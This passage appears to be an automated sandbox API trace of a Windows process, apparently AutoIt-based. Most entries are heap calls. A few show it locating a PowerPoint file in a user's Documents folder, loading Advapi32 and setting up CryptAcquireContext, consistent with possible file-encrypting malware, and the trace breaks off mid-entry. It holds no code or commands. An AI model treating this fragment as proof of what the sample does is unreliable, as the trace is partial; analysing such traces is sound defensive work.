(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0266.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.207] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/nBWvBa.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f73ae0, ftCreationTime.dwHighDateTime=0x1d573b2, ftLastAccessTime.dwLowDateTime=0x6a3678a0, ftLastAccessTime.dwHighDateTime=0x1d5e147, ftLastWriteTime.dwLowDateTime=0x6a3678a0, ftLastWriteTime.dwHighDateTime=0x1d5e147, nFileSizeHigh=0x0, nFileSizeLow=0x17c5, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="nBWvBa.pptx", cAlternateFileName="NBWVBA~1.PPT")) returned 0xa875d0 [0266.207] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0266.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.208] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.208] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.209] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.209] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.210] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0266.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.211] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.211] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.212] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.212] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.212] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.214] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.214] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0266.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0266.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.215] WideCharToMultiByte (in: 